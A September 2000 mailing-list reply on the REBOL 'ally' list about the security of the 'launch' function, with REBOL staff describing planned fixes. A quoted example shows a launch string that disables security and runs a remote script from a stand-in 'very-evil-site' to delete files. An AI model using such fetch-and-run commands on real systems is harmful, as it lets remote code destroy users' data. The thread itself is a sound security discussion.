[ALLY] Launch security? Re:(4)
From: allenk:powerup:au at: 17-Sep-2000 3:23
----- Original Message -----
From: <[jeff--rebol--com]>
To: <[ally--rebol--com]>
Sent: Sunday, September 17, 2000 1:23 AM
Subject: [ALLY] Launch security? Re:(3)
>
> >>> Frank ([fsievert--uos--de]) wrote:
> >>> I think that launch is
> >>> not a really good idea. What happens, when I say
> >>> launch {-s --do "do
http://www.very-evil-site.com/delete_all_stuff.r"}
> Launch is being changed to improve its security in two
> important ways:
>
> 1. Launch only works from the test panel -- so launched
> scripts can not launch others.
>
> 2. Launched scripts *should* always start with default
> security running, regardless of other monkey business
> that people do with the launch string.
Hi Jeff,
I think if the second item is implemented then we may not not need the
first. Being able to launch is good, if for no other reason than to keep
sessions from global contamination.
Apart from 'do, 'script and quiet, are any of the others needed for launch?
Maybe 'no-window would be good for spawning a server, but I wonder what
dangers allowing the launching of 'no-window scripts could hold?
> That's the basic idea. We really want to be able to use
> launch so if you see cases where the above is not the case
> or you think you see other risks involved with launch please
> let us know!
>
> The current behavior of launch isn't likely the final
> behavior, but we need something like launch in the meantime
> until we add mult-tasking. So let's patch the holes and
> make it useful.
>
> -jeff
Multi-tasking too, the future is looking bright.
Cheers,
Allen K
Apologies to the world for Human Nature singing the our national anthem at
the Olympics games. Those responsible have been sacked :-) Our new team of
Llamas are doing a much better job.